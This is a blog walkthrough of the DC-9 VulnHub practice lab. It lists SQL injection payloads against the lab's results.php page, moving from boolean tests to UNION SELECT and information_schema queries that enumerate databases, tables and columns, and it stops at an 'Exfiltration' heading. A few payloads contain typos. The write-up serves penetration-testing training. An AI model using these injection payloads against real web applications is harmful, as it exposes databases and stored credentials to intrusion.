DC: 9 — Walkthrough/Writeup

4 min readJun 29, 2021

DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

DC: 9

DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration…

www.vulnhub.com

Enumeration

More Enumeration…

Enumerating the port 80:

Nikto Scan

Gobuster

Manual Enumeration

— Found nothing on the website source code, But while going through the site map generate by the manual enumeration on Burp — got 2 possible injection points.

Ref: http://www.unixwiz.net/techtips/sql-injection.html

/results.php

payload: a’ ‘x’=’x

url-encoded: %61%27%20%4f%52%20%27%78%27%3d%27%78

Then, used sqlmap to check it,

Payload: a’ union all select 1,2,3,4,5,6 — -

url-encoded: %61%27%20%75%6e%69%6f%6e%20%61%6c%6c%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d

let’s extract the data without using sqlmap, will be listing the payloads:

a’ OR ‘1’=’1
a’ UNION ALL SELCT 1,2,3,4,5 — -
a’ union all select 1,2,@@version,4,5,6 — -
a’ union all select 1,2,3,4,5,schema_name FROM information_schema.schemata — -
a’ union all select 1,2,3,4,table_schema,table_name FROM information_schema.tables — -
a’ union all select 1,2,CONCAT(TABLE_SCHEMA,”:”,TABLE_NAME),3,4,5 FROM information_schema.columns — -

DB:Table

Staff:StaffDetails / Staff:Users / users:UserDetails

a’ union all select 1,2,CONCAT(COLUMN_NAME,”:”,TABLE_SCHEMA,”:”,TABLE_NAME),3,4,5 FROM information_schema.columns — -
a’ union all select 1,2,CONCAT(COLUMN_NAME,”:”,TABLE_SCHEMA,”:”,TABLE_NAME),3,4,5 FROM information_schema.columns where TABLE_SCHEMA=”Staff” OR TABLE_SCHEMA=”users” — -

Exfiltration